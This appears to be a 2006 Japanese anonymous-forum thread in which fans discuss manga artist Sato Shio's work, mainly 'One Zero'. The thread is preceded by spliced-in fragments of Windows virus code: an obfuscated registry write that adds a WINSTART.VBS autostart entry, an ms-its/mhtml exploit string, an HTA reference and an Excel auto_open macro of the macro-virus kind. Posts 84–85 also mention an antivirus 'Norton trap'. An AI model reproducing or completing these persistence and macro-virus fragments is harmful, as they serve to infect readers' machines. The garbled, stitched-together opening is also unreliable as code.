G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

63 :花と名無しさん:2006/09/16(土) 03:53:57 ID:???0
ウイルス貼るぐらいうざかったんだなw

64 :花と名無しさん:2006/09/16(土) 10:53:09 ID:???0
文庫版になると、
巻末にいろんな人が佐藤さんや作品等について語ってる。
そこだけ読みたいので、ブックオフで探しては立ち読みしてます。w
が、あまり置いてないんだよなね。

65 :花と名無しさん:2006/09/16(土) 11:32:17 ID:???0
>>57

>>55です。その短編は『夢庭園』収録の、おそらく表題作だったと思います。
押入れのどっかにまだあると思うんだけど…。

ストーリーは(うろ覚えで妄想も混じっていますが)、

何らかの理由(戦争か大規模な実験の失敗)により、
人類が激減し、密林に覆われた世界。
主人公の少年は放浪中。はぐれた妹を探している。
一匹の小猿と出会い旅のお供にする。
そのうち廃墟となった研究施設にたどりつき、
恐るべき実験の真実を知るが…。

という内容だったような。

66 :花と名無しさん:2006/09/16(土) 22:33:26 ID:???0
三宅乱丈って漫画家が描いてる
「イムリ」って作品がちょっと佐藤史生を彷彿とさせる

「やどり木」だっけ?
あの全寮制の学校で脳味噌改造するやつ
あれに何だかちょっと近い感じ

67 :花と名無しさん:2006/09/17(日) 00:48:31 ID:???O
>>65

>>57です。
『夢庭園』ですね。ありがとうございます!探してみますね。

68 :花と名無しさん:2006/09/17(日) 07:47:48 ID:???0
>あの全寮制の学校で脳味噌改造するやつ

こうまとめられると妙に安っぽくなるな。w

69 :花と名無しさん:2006/09/18(月) 04:24:00 ID:???0
>>66
三宅乱丈とはまた意外なところからw

70 :花と名無しさん:2006/09/18(月) 19:24:41 ID:ZPR3Sqh90
>67
題名は『獸たちの影』ですね
『夢庭園』の巻末に佐藤さんのお言葉がある
鳥図明児&佐藤史生好きの自分には嬉しい一冊です

71 :花と名無しさん:2006/09/18(月) 22:38:05 ID:???0
>41
しりとりいきます。スレ立て後のしりとり索引コーナーは
ほんと、お役立ちスレです。確認しました。
「う」でしたね。

「ウブド」(ハヌマンを探して)・コミクス「精霊王」

インドネシア行ったこと無いので
この話読むたび無性に行きたくなる。
今でもシアジャという木彫りの老舗には
アンタ・ボガ(!)の名品が飾られているんだろうか。
見た人います?

次「ど」又は「と」でお願いします。

72 :花と名無しさん:2006/09/26(火) 18:22:12 ID:???0
>>71
トゥネ(レディ・トゥネ)「羅陵王」

既出?

73 :花と名無しさん:2006/09/26(火) 18:32:45 ID:???0
>>72
>>10

74 :花と名無しさん:2006/09/26(火) 23:54:35 ID:???0
しりとりもなかなか長くなっちゃったんで、
気軽にのっかりにくいよね。
考えるときは、コミック4,5冊はかかえて考えないといけない(笑)
でも新作祈願しりとりだから、細々でいいから続けたいです。

75 :花と名無しさん:2006/09/27(水) 08:54:03 ID:???0
プチフラでやってたバビロン〜あたりでハマったので
単行本なかなか手に入らない orz
絶版本多いし新参ファンにはつらい状態ですね

76 :花と名無しさん:2006/09/27(水) 16:13:01 ID:???0
古参ファンの友人を作る→単行本をまとめて借りる→パクる
→引っ越す、TELもメルアドも変える→ウマー

77 :花と名無しさん:2006/09/27(水) 20:52:15 ID:???0
>>76
おいおい・・・でも行きつけのマンガ喫茶にある「春を夢見し」
思わずカバンに入れたくなったよ

78 :花と名無しさん:2006/09/27(水) 22:03:36 ID:???0
ではしきり直しで、
>>71
トークン(タクシー・トークン)「ワン・ゼロ」

トキオのうちに3人が呼び出されて来ちゃったときに、
マンションに帰るのに使ってましたよね。
ふと思い出したのですが、まとめみるとまだ出てないみたい。
ほかにもそういや公衆電話のトークン、なんてのもあったような・・・


79 :花と名無しさん:2006/09/27(水) 22:04:48 ID:???0
あ、注記。

次は「ク」または「クン」で始まる語でお願いします。

80 :花と名無しさん:2006/09/28(木) 18:30:16 ID:???0
「クン」と聞いた瞬間、
クンツァイトとか連想したセラムンファン……このスレで自分だけかもw

81 :花と名無しさん:2006/09/28(木) 19:04:35 ID:???0
>>77
常連さんなら、頼めばもしかして売ってくれるんじゃねえの?

82 :花と名無しさん:2006/09/29(金) 08:10:39 ID:???0
>77
うちの近所の漫喫は人気のないっつーか手に取られることの少ない漫画は、
たまにタダで配ってる
新しい漫画がドンドン入ってくるもんで、場所が足りなくなるんだろう

83 :花と名無しさん:2006/09/30(土) 00:51:33 ID:???0
>>81
>>82
いいな・・・でも結構マニアックな品揃えの店なので
期待は薄いかも

「天界の城」みたいな感じで再刊されんかねえ

84 :花と名無しさん:2006/09/30(土) 10:56:53 ID:???0
スレ違いで申し訳ない

萩尾望都スレにも行ってる方っています?
  ↓
新スレ(23)って閲覧しても別に問題ない?
旧スレ(22)の982で新スレが紹介されたときに踏んだら、
トロイの木馬が検出されたんだけど(すぐ除去されたけど)

85 :花と名無しさん:2006/09/30(土) 15:38:10 ID:???0
>>84
無害。「ノートントラップ」という。

http://ansitu.xrea.jp/guidance/?Trap#NortonTrap

86 :花と名無しさん:2006/10/02(月) 23:12:19 ID:???0
佐藤史生作品の年表、
つまりこの作品はこの作品につながってて、それはこれのあと、とか
作ってみるのも面白いかもね。とフト思った。

87 :花と名無しさん:2006/10/06(金) 02:15:47 ID:a0Z5MU3a0
佐藤史生先生の「夢みる惑星」と「ワン・ゼロ」は、
今でも一番好きな漫画です。
20年も前の作品にもかかわらず。
「ワン・ゼロ」の後に「オウム事件」が起った時は不謹慎かもしれませんが、
非常に衝撃を覚えました。
再版とかされることはないのでしょうか?
あんな名作はめったに無いのに勿体無いと思います。

私は、イリスが一番好きです。

88 :花と名無しさん:2006/10/06(金) 03:53:01 ID:???0
馬鳴がそういう声を発する場面があるね。
自分は順序が逆だったので別の意味で衝撃を受けた。
中沢新一あたりとは全然別だけど・・

文庫は小さいから豪華版か全集出して欲しいな

89 :花と名無しさん:2006/10/06(金) 16:58:45 ID:???0
>87-88
素朴な疑問なのだが

「ワン・ゼロ」やオウム事件以前に、
真言やマントラについて見聞きしたことはなかったの?


90 :花と名無しさん:2006/10/06(金) 17:49:29 ID:???0
見聞きしたことがあったらショックを受けないということもないと思う

91 :花と名無しさん:2006/10/06(金) 18:35:33 ID:???0
>>89
微妙にピントのずれた疑問だな…

パトレイバーやMWや幽遊白書などのファンの人達も驚いたんだがら、
普通の反応だろう。

92 :花と名無しさん:2006/10/06(金) 18:42:32 ID:???0
なんでパトレイバー?

93 :花と名無しさん:2006/10/06(金) 18:52:16 ID:???0
パトレイバー(映画)で空から毒ガスまく描写があったらしい

94 :花と名無しさん:2006/10/06(金) 19:08:45 ID:???0
>90
そりゃショックは受けるだろうが、
事前にそういったことについて知識があれば
別に『ワン・ゼロ』と結びつけはしないだろうと思って

95 :92:2006/10/06(金) 20:16:37 ID:???0
>>93
ありがとう

>>91
普通って事もなかろう。
自分は今日このスレで初めてオウム事件からワン・ゼロを
連想した人がいたのを知ったよ。

96 :花と名無しさん:2006/10/07(土) 00:08:59 ID:???0
最近佐藤史生を知って、「ワン・ゼロ」読んで私も真っ先にオウムが浮かんだよ。
真言やらなんやらは宗教と神話に興味があったのでずっと以前から知ってたけど、
だからどうということもない

>>95
かえってオウム以前に読んだ人はまったく連想もしないかもね

97 :花と名無しさん:2006/10/07(土) 00:27:45 ID:???O
というか文庫版の解説でもあったし

98 :花と名無しさん:2006/10/07(土) 01:23:51 ID:???0
自分は先に読んでて、地域柄、事件前からオウムは知ってたけど
やっぱり連想したよ。麻原は転輪聖王自称してたし。
別に、ワンゼロだけを連想した訳じゃないけど、同じような用語を使ってるんだし
全然連想しないっていうのも、頭が堅いんじゃないか?

オウムがネタ元にしてた可能性もあるし。
ネタ元に関しては、山田ミネコの方が可能性は高いと思うけど
どうせでたらめだし。

99 :花と名無しさん:2006/10/07(土) 02:26:12 ID:???0
他人がどう考えるべきか指定するほうが
頭が固い

100 :花と名無しさん:2006/10/07(土) 07:35:24 ID:???0
(σ´∀`)σ1o0ゲッツ!!

101 :花と名無しさん:2006/10/07(土) 09:00:19 ID:???0
>97
誰の、どんな内容の解説?

>96
>かえってオウム以前に読んだ人はまったく連想もしないかもね

うむ
オウムのほかの点ばかりに目がいったからかもね


102 :花と名無しさん:2006/10/07(土) 11:19:43 ID:???0
チベット仏教→オウム真理教という連想はしたが
ワンゼロと結びつけたことはなかった。
ワンゼロを読んだのはオウム真理教事件以降。

オームの発音はいい感じの脳波でるね。

103 :花と名無しさん:2006/10/07(土) 11:48:11 ID:???O
町山智浩って人。
十年ぶりに読み返したら某カルト集団を連想しちゃう自分がやだけど、
主人公側のスタンスは教団の対極にあるよね、という感じで言及してた

104 :花と名無しさん:2006/10/09(月) 20:16:50 ID:???0
文庫の解説ってウェイン町山なのか
どんなつながりなんだ

105 :花と名無しさん:2006/10/09(月) 20:24:11 ID:???0
マユリこそがオウムの教祖だよね
それはアホラシイし害があるからやだってのが主人公側で…
80年代−90年代にはそういうマンガはたくさんあった
神殺しものというかね。
そういう意味では全く先進性は感じなかった。当時としては流行りのテーマ。

オウムでびっくりしたのは、そんなベタベタなものに引っかかるのがいるということ。
「ワンゼロくらい読んどけよ」と思った記憶がある。

106 :花と名無しさん:2006/10/09(月) 23:45:37 ID:???0
『ワン・ゼロ』の中でトキオが、

「限度を超えた分が悪いというのか?
 それは随分と都合のいい理屈だな(大意)」

と言っていたのだが、
自分はトキオの言い分のほうが妙だと思った。
世の中には絶対的な善も絶対的な悪もないのだから、
状況に応じて柔軟に考えていかなきゃならんじゃんか、と。
大切なのはバランスとか、ね。

みなさん、どう思いました?

107 :花と名無しさん:2006/10/10(火) 03:18:32 ID:???0
>>106
おまいさんは「端の迷惑になるから氏んでくれ」って言われてあっさりOKできる?
確かに世の中には絶対的な善も悪もないが、個人の中にはあるでしょ。
自分は都祈雄の言ってる事に禿同だったよ。他人の作った線引きに盲従するのはまっぴら御免だ。

108 :花と名無しさん:2006/10/10(火) 07:12:45 ID:???0
チェンジリングのリン・ミライも似たよなことを言ってたな。
正しかろうとまちがっていようと、問題じゃないってことがあるものよ。
行為ならまだしも、存在そのものの価値を勝手に決められてはたまらん。

109 :花と名無しさん:2006/10/10(火) 10:23:51 ID:???0
トキオの言ってるのは絶対的な善悪がないからこそ「良くも悪くもほっとけ」
ってことで、人間が勝手に自滅するならそれもよし、バランスをとって生き
延びるならそれもよしってことだと思うが…

110 :花と名無しさん:2006/10/10(火) 10:43:55 ID:???0
>109
トキオは確かに全体的にそういう見解だったように思う

でも
>「限度を超えた分が悪いというのか?
> それは随分と都合のいい理屈だな(大意)」
というセリフは、
「程度の問題じゃなく、善と悪に分けられる」とも読みとれて
なんかトキオもブレてる感じがする

ただ、ワン・ゼロが手元にないので
細かいとこは確認できずにうろ覚えでの書き込みなんだが
なんか勘違いしてたらすまん

111 :花と名無しさん:2006/10/10(火) 10:52:03 ID:???0
>>110
いや、どっちかっていうとトキオは
本質は同じものなのに、どこかに線を引かれて
その線を超えないものは善(植物とか)、それを超えるものは悪
という分け方はどうなんだ?と言ってるんじゃないかと思う。
しかも、その線は誰が引いてるんだ?ということじゃないかな。

112 :花と名無しさん:2006/10/10(火) 10:55:34 ID:???0
単に「超越者気取りウゼー」だと思っていたよ。
読みが浅いわ、自分。

113 :花と名無しさん:2006/10/10(火) 12:08:24 ID:???0
>>112
いやそれもあってるよw

>>110
マユリ「人間イクナイ!改変しる!」→トキオ「他の動植物だって同じだお。
なんで人間だけイクナイの?」→マユリ「やりすぎイクナイ」→トキオ「超越者気取りウゼー」

善悪はもともとマユリが持ち出した話題だよ

114 :花と名無しさん:2006/10/11(水) 21:54:54 ID:???0
ピンク色の幸福な羊になりたいな\(^o^)/

115 :花と名無しさん:2006/10/12(木) 00:35:15 ID:???0
馬鳴のルックスが自分の理想。性格も理想。エミーウラヤマシス
佐藤さんの描くスポック氏な髪型のキャラは自分にとって神。

116 :花と名無しさん:2006/10/13(金) 20:31:24 ID:???0
>馬鳴のルックスが自分の理想

いっしゅん「馬場のルックス」にwww

117 :花と名無しさん:2006/10/13(金) 21:29:08 ID:???0
>115さんほどではないが、スポックさんの魅力、分かるなー。
目が自然と追いかけてしまうのだな。

118 :花と名無しさん:2006/10/14(土) 21:05:13 ID:???0
踊るシリーズのスピンアウトの弁護士とりびあの泉の髪型がスポック氏だ。

119 :花と名無しさん:2006/10/17(火) 23:47:54 ID:???O
私は魚返君の方が好きです。

120 :花と名無しさん:2006/10/24(火) 22:17:56 ID:???0
『ワン・ゼロ』のエミー、
回を追うごとにどんどんキレイになっていくのが不思議だったw

121 :花と名無しさん:2006/10/25(水) 02:14:00 ID:???0
成長もしたな。エミーだけじゃなく。


122 :花と名無しさん:2006/10/25(水) 13:21:43 ID:???0
ワンゼロは途中で主役入れ代わったしねぇ
まさかトキオがああなるとは思わなかったよ

123 :花と名無しさん:2006/10/25(水) 22:22:39 ID:???0
え? 誰から誰に?
(自分はずっとトキオだと思ってた)

124 :花と名無しさん:2006/10/25(水) 22:33:47 ID:???0
俺も入れ替わったとは思わんな

融合というなら分かるけど

125 :花と名無しさん:2006/10/25(水) 22:52:59 ID:???0
ヒロインが入れ替わった(むろん計算尽くで)というならわかる。
マウリヤからエミーへ。

126 :花と名無しさん:2006/10/26(木) 00:31:30 ID:???0
……ヒロイン? なんていたかな?w

127 :花と名無しさん:2006/10/26(木) 00:35:06 ID:???0
え、途中からはずっと馬鳴くん視点じゃなかった?

特に最終話でのトキオの現状説明では何か完全に別の世界の人
って感じで読み返すび、元々主役だったのになって思ってたんだけど

128 :花と名無しさん:2006/10/26(木) 00:43:12 ID:???0
語り手が主人公、とは限らないよ

129 :花と名無しさん:2006/10/26(木) 01:30:47 ID:???0
128に一票。アキラはあくまで脇にいる語り手。

130 :花と名無しさん:2006/10/26(木) 01:39:43 ID:???0
主人公とかヒロインていう発想で読んでなかったな

視点に着目するのは面白いかも試練

131 :花と名無しさん:2006/10/26(木) 10:50:17 ID:???0
自分もあんまりそういう感じでは読んでなかった
確かに視点は変わっていったね

132 :花と名無しさん:2006/10/26(木) 11:37:45 ID:???0
一作の中で視点や語り手が変わる漫画や小説は普通にあるかと


133 :122:2006/10/26(木) 14:01:16 ID:???0
物語の手法としては、視点や語り手を変えてく方法は確かによくありますね。

今見直してたんだけど、最終話で脇の人間に主人公像を第三者視点で
語らせるって手法をとってるだけっぽいですね。自分が勘違いしてました。

ワンゼロは、後半のアキラの印象が強かったのかな。
脳内記憶では途中でアキラ達に話の軸が移って、そのままトキオに視点が戻らないまま
フェードアウトってことになってたっぽいです。申し訳ない

134 :花と名無しさん:2006/10/26(木) 18:51:58 ID:???0
ビローチャナが主人公だと思ってたw

135 :花と名無しさん:2006/10/26(木) 19:05:07 ID:???0
あえて主人公というなら「人間」かな

136 :花と名無しさん:2006/10/26(木) 19:24:41 ID:???0
主人公を「事件や小説・劇などの中心人物」と考えれば、
普通にトキオでしょうね

>>133
確かに、途中はアキラ大活躍だったもんね。

>>135
作者が描きたかったものは「人間」だったかもしれない
けど、主人公というのはちょっと違う気がする

137 :花と名無しさん:2006/10/26(木) 22:18:03 ID:???0
まゆらのフェードアウト感はちょっとあったな
意識戻らないのかい・・みたいな

138 :花と名無しさん:2006/10/26(木) 23:21:35 ID:???0
>>134
「ヤマトの主役はデスラー」とか
「ファースト・ガンダムはシャアが主役」とかゆーのと似てるかな。w

139 :花と名無しさん:2006/10/27(金) 00:30:23 ID:???0
>>138
え?違うの?w

140 :花と名無しさん:2006/10/27(金) 03:42:56 ID:???0
宇宙猿人ゴリの主役はゴリ

141 :花と名無しさん:2006/10/27(金) 03:55:00 ID:???0
ゴドーを待ちながらの・・

142 :花と名無しさん:2006/10/27(金) 21:20:10 ID:???0
『天才バカボン』の主役はパパで、
『もーれつア太郎』の主役はニャロメ?w

143 :花と名無しさん:2006/10/28(土) 00:22:45 ID:???0
バカボンの主役はバカボン
赤塚漫画で主役が喰われるのはいつものこと

144 :花と名無しさん:2006/10/28(土) 19:27:21 ID:???0
いやーパパだろ
彼を中心に話が動いてるw

145 :花と名無しさん:2006/10/28(土) 19:29:05 ID:???0
タイトルは『火の鳥』でも、主役は火の鳥じゃないじゃん
シリーズごとに主役が変わる

146 :花と名無しさん:2006/10/28(土) 23:13:22 ID:???0
でも、「夢見る惑星」の影の主役は惑星だぞ。

147 :花と名無しさん:2006/10/29(日) 22:17:24 ID:???0
確かに指摘どおり… m9(^ω^)

148 :花と名無しさん:2006/10/29(日) 23:43:03 ID:???0
AKIRAはコミック3巻あたりの登場人物紹介見るまで金田が主人公だと気付かなかったわ
真打ちとして後から出てくるであろうAKIRA待ちだと信じてた。

149 :花と名無しさん:2006/10/30(月) 17:59:58 ID:???0
>146
意味がわからないんだが

150 :花と名無しさん:2006/10/30(月) 19:11:44 ID:???0
プレートテクトニクスが主題だといいたいのか?


151 :花と名無しさん:2006/10/30(月) 21:55:45 ID:???0
暖かいという理由で鍋の底に集まった蟻が避難する様子が主題じゃない?
とうろ覚えで書いてみる

152 :花と名無しさん:2006/10/30(月) 22:48:12 ID:???0
皮肉や冗談にマジレスするなよ>146

153 :花と名無しさん:2006/10/31(火) 21:51:04 ID:???0
ええっ! >>146ってマジレスだったのか??

154 :花と名無しさん:2006/10/31(火) 21:57:10 ID:???0
はいはいマジレスマジレス

155 :花と名無しさん:2006/10/31(火) 23:48:54 ID:???0
ネタ=>146にまじれすするなよ>149  だな。

156 :花と名無しさん:2006/11/08(水) 10:51:47 ID:???0
新作、描いてくれないかなー。
描いても発表の場がないのかな。
SFマガジンとかなら載せてくれそう。
生活費とかどうやって稼いでいるのか。
結婚しているのだろうか。
色々思う。

157 :花と名無しさん:2006/11/08(水) 12:50:47 ID:???0
プチフラがフラワーズになってからは買ってないんだけど
あの雑誌のカラーにはもう合わないのかなぁ。魔術師さがし とか普通に良かったけど。

業界板のキャリア15年以上の少女漫画家愚痴スレで、
加齢と共に視力がどんどん衰えてって絵が崩れてくのを止められない
っていう書き込みがあったんだけど、
佐藤さんの絵柄だったら多少崩れててもあんまり気にならないし(失礼)、
スローペースでも作品発表し続けていって欲しいなぁ、と思った。

158 :花と名無しさん:2006/11/08(水) 13:03:05 ID:???0
新刊出れば生活費に貢献出来るのにな

159 :花と名無しさん:2006/11/08(水) 13:17:01 ID:???0
衰えるのは視力だけじゃなくて気力、体力、握力全てだね…
絵って結構いろいろな体の部分を使って描くから

160 :花と名無しさん:2006/11/08(水) 21:25:17 ID:???0
ココはじめてきました。単行本は全部読んでるオトコです。
ところで佐藤作品は妙にクールでまるで男作家みたいな雰囲気ですが、
佐藤作品の女性の読者はテーマとか世界観がすきなんですか?
それとも他の少女マンガの読者に多いようにけっこうキャラ主体なんですか?
ちょっと聞いてみたくて。

あと三宅乱丈のイムリが挙がってましたが、PET(全5巻)はユングの深層心理を
ベースにしたと思われる、記憶改ざんSFでおもしろいですよ。
僕は、清水玲子の秘密とか小池桂一のウルトラヘヴンとかみなさんどう思われるのかなーと
気になりますが。あと暁星紀とか。

161 :花と名無しさん:2006/11/08(水) 21:49:29 ID:???0
暑苦しさを排した、その妙なクールさこそが
男作家とは違うと思ったけども。
あとジェンダー系の話の扱い方とか。

162 :花と名無しさん:2006/11/08(水) 22:20:18 ID:???0
他の少女マンガの読者ってキャラ主体なんですか?
キャラ主体とは、特有のキャラクタが好きでストーリーはあまり関係ないという意味?
よくわかりません。

163 :花と名無しさん:2006/11/08(水) 23:12:20 ID:???0
清水玲子は私はまったく受け付けないかな
男性作家でもクールな作風の人はいるけど、佐藤さんのクールさは女性ならではだね。
キャラも世界観も全部好きで楽しんでますが何か


164 :花と名無しさん:2006/11/09(木) 00:12:11 ID:???0
自分にとって一番の魅力は理知的で、やたら感傷的にならないところだけど
エミー漫画もっと読みたいなーとか思ったりもするからキャラも好き。
でもそれはこの人に限らずどの作家でもそうだよ。
キャラ造形も世界観に含まれると思うし。
むしろ、キャラ萌え「だけ」で読むにはしんどいタイプの作家じゃない?

165 :花と名無しさん:2006/11/09(木) 00:22:54 ID:???0
作品世界そのものを俯瞰する作者のクールな視線が良いんだと思う
視線はクールだけど、ユーモアもあるしハートは意外と(?)熱い感じだし

166 :160:2006/11/09(木) 00:33:50 ID:???0
どうも、ありがとうございました。なんとなくわかりました。
ちょっと説明が下手だったかもしれませんが、僕のまわりの女性少女マンガ読者は、
たいてい何がしかのキャラに感情移入して読んでたようなので、キャラより、
設定や世界が主体(と自分には思える)な佐藤作品の女性読者ってどう読んでる
のかなー?と思ったわけです。
ありがとうございました。

167 :花と名無しさん:2006/11/09(木) 00:59:05 ID:???0
佐藤作品もその他作家作品もキャラ萌え主体では読んでいないし、
女はそういう読み方をする、みたいな括りはちょっとモニョるなぁ

自分の場合、情緒たっぷりなのはしんどいけど、本格SF好きの人ほど
素養があるわけでもないので小難しいことばかり並べられてもしんどい、
佐藤作品は感情面に訴えすぎず、説明調にもならずバランスが良くて読みやすい

168 :花と名無しさん:2006/11/09(木) 10:51:25 ID:???0
160読んで荒れるんじゃないかと思ってヒヤヒヤした
危なっかしいなあ・・

169 :花と名無しさん:2006/11/09(木) 23:23:46 ID:???0
定住人が大人だから大丈夫。

170 :花と名無しさん:2006/11/10(金) 19:32:58 ID:???0
ぼく、3歳・・・・・・・・・・・・・・・・・・・・・・・・ツマラン

171 :花と名無しさん:2006/11/11(土) 01:00:47 ID:???0
160をみておもったんだけど・・・
逆にクールなSFを書く男性作家っていたっけ?
諸星大二郎ぐらいしか思いつかん・・・
女性作家なら、
内田善美(星の時計のLiddell)
萩尾望都(11人いる)
佐々木淳子(那由他)
と、思いつくのだが・・・
SFというよりファンタジーっぽいかもしれんが
たんたんとしてるよね
男性作家は、理屈っぽいか、逆にとんでも系が多いような・・・

172 :花と名無しさん:2006/11/11(土) 02:00:26 ID:???0
>>171
その理屈っぽいのを、論理的・だからクールと
言ってるのかも。

173 :花と名無しさん:2006/11/11(土) 02:25:45 ID:???0
大友克洋、
星野之宣、
士郎正宗、
石ノ森章太郎、
藤子F不二雄、
松本零二、
永井豪、
谷口ジロー、
吾妻ひでお、
藤原カムイ、
岩明均、
松本大洋、
高山和雅、
奥浩哉、
小田ひで次、
・・・・・・・・・・・・・・・・・・(手塚治虫)・・・・・・。



174 :花と名無しさん:2006/11/11(土) 03:02:18 ID:???0
岩明均でサイエンスな作品なんてあったっけ?

175 :花と名無しさん:2006/11/11(土) 08:09:14 ID:???0
萩尾望都はクールかな?
すごくエモーショナルだと思ってたけど

176 :花と名無しさん:2006/11/11(土) 09:02:04 ID:???0
>>173
半分くらいは読んだことあるし面白いとも思うけど、
佐藤の良さは独特だと思う。
もうちょっと男性作家にも頑張って欲しいなあと思う俺は男。

177 :171:2006/11/11(土) 09:36:33 ID:???0
たしかに自分のあげた3人はクールと
ちょと違うかも・・・
自分は情緒的・思索的なものが好きなので・・・
男性作家のSF的舞台設定による
戦闘ものはなんだかな〜って感じです。

でも、「ワン・ゼロ」は、戦闘ものかしらん(笑)

大友克洋(アキラ)
士郎正宗(甲殻機動隊)
石ノ森章太郎(サイボーグ009)
藤子F不二雄(ドラえもん)
松本零二(銀河鉄道999)
永井豪(デビルマン)
(手塚治虫(火の鳥))
ほかのシトのSF作品はあまりしらん

ん〜、クールなのだろうか・・・
別の作品?

でも、幸村誠(プラネテス)は好き。

178 :花と名無しさん:2006/11/11(土) 11:50:01 ID:???0
岩明均→寄生獣?七夕の国?
藤子F不二雄→SF短編

179 :花と名無しさん:2006/11/11(土) 12:19:27 ID:???0
佐藤せんせ自身がすきなSF(に限らず)ってなんですか?
しってるヒトいる? 漫画にかぎらず小説とかテレビでも。

180 :花と名無しさん:2006/11/11(土) 12:28:40 ID:???0
アシモフのロボットがアイドルだとか書いてたような。

あとスポック

181 :花と名無しさん:2006/11/11(土) 12:30:39 ID:???0
>>160
「暁星紀」は最初はファンタジーっぽかったけど
途中で作者が風呂敷広げすぎたあたりから
へんにマッチョな漫画になっちゃった気がする。

比べるのはおかしいかもしれないが
地球以外の辺境惑星に入植した人間たちを描いた
佐藤史生の「やどり木」はもっと淡々としていたなあ。

暁星紀で、男が女を奴隷のように扱う社会状況のなか
ある村で女性たちが意識改革にめざめ、
ひそかな啓蒙が行われ始める、とゆうのは面白かった。

182 :花と名無しさん:2006/11/11(土) 12:50:54 ID:???0
山田ミネコも(フロシキ広げすぎだけど)最終戦争シリーズの
世界観には、ほんと驚かされたYO……。
私の中では佐藤史生と山田ミネコはSFの双璧。年がばれるね

183 :花と名無しさん:2006/11/11(土) 13:10:39 ID:???0
大御所作家さんの名前が上がるなかアレだけど
ビブロスのオタク雑誌で描いてた石原理のサイバーパンク?ものって
なんか佐藤さんのとどことなく似てる気がする。
似てるというかこの人佐藤史生好きそーみたいな。
どこが似てんの?どこがSF?誰?だったらごめんなさい。
クールとも違うかもしれない・・・

184 :花と名無しさん:2006/11/11(土) 15:20:32 ID:???0
>>183
それなんて作品? 読んでみたい。
>>160の推してたPET面白いよ。三宅、女ってしってた?

185 :花と名無しさん:2006/11/11(土) 19:30:24 ID:???0
三宅については、いしかわじゅんが、
便所に小物を並べてるような表現は男には書けないと言ってたね。

186 :花と名無しさん:2006/11/11(土) 22:48:07 ID:???0
女性作家だから〜、という評論はあんまし好きじゃないなぁ

もちろん「ああ、そうか!」と腑に落ちるときもあるけど、
あんまりにも濫発されすぎて
(特に、女性作家を評論するとき)

>>160
佐藤作品はキャラクターも世界観の設定も、どっちも魅力だ。

他の作品もそうだろうと思うけど。
(どちらに比重がかかってるか、って程度の相違はあるだろうけど)

187 :花と名無しさん:2006/11/12(日) 13:29:38 ID:???0
佐藤史生作品は一見シニカルでドライだけれども、
登場人物に血が通ってて生きることに熱くて
簡単に自己憐憫に浸ったりしないところがいい。
新作が読みたい×100

188 :花と名無しさん:2006/11/12(日) 15:22:06 ID:???0
>簡単に自己憐憫に浸ったりしないところがいい
それそれ

189 :花と名無しさん:2006/11/12(日) 20:39:46 ID:???0
>>184
タイトルはカプセル・ヨードチンキ
ビブロス倒産する前から絶版なので手に入りにくいかも
ブクオフでチラホラ見かけますが、同じビブのBL漫画の
隣に並べられてますので、抵抗がなければ・・・
名前が男みたいだけど女性です

190 :花と名無しさん:2006/11/12(日) 21:17:13 ID:???0
>>189
さんきゅー。みてみるわww


191 :花と名無しさん:2006/11/16(木) 14:43:44 ID:???0
話題提供
みんなは夢見る惑星とワンゼロとそれ以降の短編ではどれが好き?
どれも好きというと何なのであえてどれが?
(あるいはそれ以前の短編が好き?)


192 :花と名無しさん:2006/11/16(木) 16:39:08 ID:???0
というかなぜそれ以前と以降で分けるのか

193 :花と名無しさん:2006/11/16(木) 19:53:07 ID:???0
以前と以降で違わない?
おおざっぱだとは思うけど。
新書館のころも小学館のころも同じ?

194 :花と名無しさん:2006/11/17(金) 11:07:32 ID:???0
自分は、
その2作品で初めて佐藤史生という漫画家を知った

だから何となく
その前後で分けてたけど、
実際何がどう違うのか分析・評論を試みたことはないなぁ

195 :花と名無しさん:2006/11/18(土) 19:31:07 ID:???0
ベタだがやっぱり金星樹が名作だろう
たとえ宇宙船の形がアレだろうとw

196 :花と名無しさん:2006/11/18(土) 20:33:52 ID:???0
今日、国立科学博物館へいった。
すると、「ワン・ゼロ」のなかで、
アシュバやアビの再生に使ったつぼに
よく似たものが展示されていた。
ゲムエンエフホルバクのカノポス容器といって
人頭、ヒヒ頭、犬(ジャッカル)頭、鳥(ハヤブサ)頭と
若干異なっているが、きっとコレがモチーフなのかなと
思われるほど、酷似している。
ミイラにするときに取り出した4つの臓器をいれるらしい。

http://www.kahaku.go.jp/exhibitions/ueno/special/2006/mummy/tenji-html4.html

佐藤さんの作品の世界観がしっかりしているのは
こんなトコからもうかがえる。

197 :花と名無しさん:2006/11/18(土) 21:11:27 ID:???0
そう言えばウルでもそういうの使ってたな

198 :花と名無しさん:2006/11/18(土) 21:35:43 ID:???0
昔人間がよくやってたよね

199 :花と名無しさん:2006/11/20(月) 19:43:06 ID:???0
世界観というか設定のための資料がきちんとしているというか

200 :花と名無しさん:2006/11/26(日) 00:43:40 ID:0MT7/Kbo0


201 :花と名無しさん:2006/11/28(火) 11:13:24 ID:???0


202 :花と名無しさん:2006/11/29(水) 00:43:47 ID:???0


203 :花と名無しさん:2006/11/29(水) 12:34:05 ID:???0


204 :花と名無しさん:2006/11/29(水) 20:37:38 ID:???0


205 :花と名無しさん:2006/11/29(水) 21:59:10 ID:???0
いますからw

206 :花と名無しさん:2006/11/30(木) 01:52:04 ID:???0
む……計画失敗w

207 :花と名無しさん:2006/12/01(金) 19:42:36 ID:???0


208 :花と名無しさん:2006/12/01(金) 20:34:36 ID:???0


209 :花と名無しさん:2006/12/02(土) 14:57:37 ID:???0


210 :花と名無しさん:2006/12/02(土) 22:03:16 ID:???0


211 :花と名無しさん:2006/12/02(土) 22:52:02 ID:???0


212 :花と名無しさん:2006/12/04(月) 18:55:11 ID:???0
>>211
「行く年来る年」にしたかったのにw

寒いから鍋やりたい……と思った瞬間、
ミノルを待ちつつ、
鍋をつつくエミーとアキラの図が浮かんだ

213 :花と名無しさん:2006/12/04(月) 19:42:07 ID:???0
あのお鍋美味しそうだったなー

214 :花と名無しさん:2006/12/06(水) 11:23:20 ID:???0
